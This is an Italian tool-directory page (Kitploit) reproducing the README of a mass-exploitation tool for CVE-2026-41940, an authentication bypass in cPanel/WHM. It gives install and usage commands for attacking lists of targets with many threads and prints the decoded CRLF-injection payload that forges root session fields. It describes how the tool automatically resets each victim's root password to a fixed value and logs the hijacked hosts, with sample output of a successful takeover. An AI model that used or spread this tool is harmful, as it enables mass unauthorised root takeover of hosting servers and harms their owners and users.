Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41940 — Scanner bulk e strumento di sfruttamento di massa per CVE-2026-41940 su cPanel/WHM, progettato per la validazione automatizzata dei bersagli e l'esecuzione multi-thread ad alta velocità. | Kitploit
Strumenti/GitHubGitHub/jenderal92/cve-2026-41940
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlAutenticazioneRed TeamingSviluppo Payload
GitHubjenderal92/cve-2026-41940

CVE-2026-41940

Scanner bulk e strumento di sfruttamento di massa per CVE-2026-41940 su cPanel/WHM, progettato per la validazione automatizzata dei bersagli e l'esecuzione multi-thread ad alta velocità.

44264 mesi faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-41940 - Exploit di massa di bypass dell'autenticazione WHM/cPanel

43153

📋 Descrizione

CVE-2026-41940 è una vulnerabilità critica di bypass dell'autenticazione in WHM/cPanel che consente agli aggressori di eludere l'autenticazione e ottenere accesso root a un server senza credenziali valide. La vulnerabilità sfrutta l'iniezione CRLF nel meccanismo di gestione delle sessioni per iniettare parametri di sessione dannosi.

Questo strumento fornisce capacità di exploit di massa con supporto multi-threading per testare più target contemporaneamente, con rilevamento intelligente del successo e filtraggio automatico dei target non validi.


🎯 Caratteristiche principali

CaratteristicaDescrizione
✅ Exploit di massaScansiona e sfrutta più target da un file di elenco
🚀 Multi-threadingNumero di thread configurabile per scansioni più veloci (default: 15)
🔐 Cambio password automaticoCambia la password di root in Jenderal92 dopo l'exploit riuscito
🛡️ Rilevamento intelligente del successoRileva automaticamente vari formati di risposta API WHM
⚠️ Filtraggio errori di licenzaEsclude target con errori di licenza non valida/non leggibile
📝 Output strutturatoSalva solo i successi confermati nel formato `dominio:porta
🛡️ Supporto SSL/TLSGestisce automaticamente i certificati autofirmati
🔄 Gestione delle sessioniEstrazione automatica della sessione, iniezione di cookie e gestione dei token
⏱️ Controllo timeoutTimeout di connessione configurabile (default: 15 secondi)
🔍 Verifica pre-connessioneControlla la disponibilità della porta prima del tentativo di exploit
📊 Avanzamento in tempo realeMostra progressi dettagliati per ogni fase dell'exploit

📦 Requisiti

  • Python 2.7 (richiesto - NON compatibile con Python 3.x)
  • Connessione Internet per l'accesso ai target
  • Pacchetti Python richiesti:
pip install requests urllib3 futures

Oppure usa requirements.txt:

requests==2.27.1
urllib3==1.26.18
futures==3.4.0

📥 Installazione

# Clona il repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940

# Installa le dipendenze
pip install -r requirements.txt

# Rendi eseguibile (Linux/Mac)
chmod +x CVE-2026-41940.py

🚀 Utilizzo

1. Prepara il file dei target

Crea un file targets.txt con un target per riga:

https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com

Nota: La porta 2087 è la porta WHM predefinita. Se non specificata, verrà usata automaticamente la porta 2087. Il prefisso HTTP/HTTPS verrà aggiunto automaticamente se mancante.

2. Esegui l'exploit

Utilizzo base (impostazioni predefinite)

python2 CVE-2026-41940.py targets.txt

Utilizzo multi-thread

# Usa 5 thread concorrenti
python2 CVE-2026-41940.py targets.txt --threads 5

# Usa 20 thread per scansioni più veloci
python2 CVE-2026-41940.py targets.txt --threads 20

Hostname personalizzato

# Sovrascrivi l'header Host per tutti i target
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10

Timeout personalizzato

# Imposta il timeout a 30 secondi per connessioni lente
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30

📊 Argomenti della riga di comando

ArgomentoDescrizionePredefinitoObbligatorio
list_fileFile contenente l'elenco dei target (uno per riga)-✅ Sì
--threadsNumero di thread concorrenti15❌ No
--hostnameSovrascrivi l'header Host per tutti i targetAuto-rilevamento❌ No
--timeoutTimeout di connessione in secondi15❌ No

📁 Formato di output

File dei risultati (res.txt)

Vengono salvati solo gli exploit riusciti confermati. I target con errori di licenza, cambi di password falliti o problemi di connessione vengono automaticamente esclusi.

Formato:

dominio:porta|root|Jenderal92

Esempio di output:

www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92

Scenari esclusi

I seguenti target NON verranno salvati in res.txt:

  • Errori di licenza (Cannot Read License File)
  • Cambi di password falliti
  • Timeout o rifiuti di connessione
  • Target senza WHM o già patchati
  • Credenziali errate o fallimenti di sessione

Output sulla console

$ python2 CVE-2026-41940.py targets.txt --threads 10

 CVE-2026-41940 bypass authentication - Mass Exploit

[*] Caricati 4 target
[*] Avvio exploit con 10 thread...
[*] Timeout: 15 secondi
[*] Nota: http:// verrà aggiunto automaticamente se mancante
[*] SOLO i target con cambio password confermato verranno salvati in res.txt
[*] I target con errori di licenza, problemi di connessione o cambi di password falliti verranno ESCLUSI

==================================================

[*] Controllo target: 127.0.0.1
    Input originale: 127.0.0.1
    Normalizzato: https://127.0.0.1:2087
    Porta 2087: APERTA
    Test connessione... OK (HTTP 200)

[0] hostname = example.com
[1] creazione sessione preauth...
    sessione base = :d5nPe99Nx9HQdMu2
[2] invio dell'iniezione CRLF...
    HTTP 307, token trapelato = /cpsess0488087910
[3] attivazione di do_token_denied per propagare...
    HTTP 401, gadget attivato
[4] verifica di essere root su WHM...
    /json-api/version -> HTTP 200  {"version":"11.118.0.13"}
[*] tentativo di cambiare la password di root
    passwd -> HTTP 200
    {
      "data": {
        "app": ["system"]
      },
      "metadata": {
        "output": {
          "raw": "Password for \"root\" has been changed."
        },
        "reason": "Password changed for user \"root\".",
        "version": 1,
        "command": "passwd",
        "result": 1
      }
    }
[+] Cambio password confermato (metadata.result=1)
[+] ✓ Password di root cambiata con successo in 'Jenderal92'!

[✓] SUCCESSO & SALVATO: 127.0.0.1:2087
    Salvato in res.txt: 127.0.0.1:2087|root|Jenderal92

==================================================
[*] Scansione completata!
[*] Target con password cambiate con successo: 1 su 4

[+] Risultati salvati in res.txt

Target sfruttati con successo (password cambiata in Jenderal92):
  ✓ 127.0.0.1:2087

🔬 Come funziona l'exploit

L'exploit è composto da 4 fasi principali con verifica intelligente:

Fase 1: Sessione di pre-autenticazione

[1] creazione sessione preauth...
  • Invia una richiesta POST a /login/?login_only=1 con credenziali non valide
  • Recupera il cookie whostmgrsession dalla risposta del server
  • Estrae la base della sessione rimuovendo la parte finale ,<obhex>
  • Questo ci fornisce un formato di sessione valido su cui lavorare

Fase 2: Attacco di iniezione CRLF

[2] invio dell'iniezione CRLF...
  • Invia una richiesta GET con header Authorization: Basic contenente il payload dannoso
  • Il payload Base64 decodificato è:
    root:x
    successful_internal_auth_with_timestamp=9999999999
    user=root
    tfa_verified=1
    hasroot=1
    
  • I caratteri CRLF (\r\n) iniettano parametri di sessione falsi
  • Questo induce il server a pensare che l'autenticazione sia riuscita
  • Il server risponde con HTTP 307 e un header Location contenente il cp_security_token
Scarica lo strumento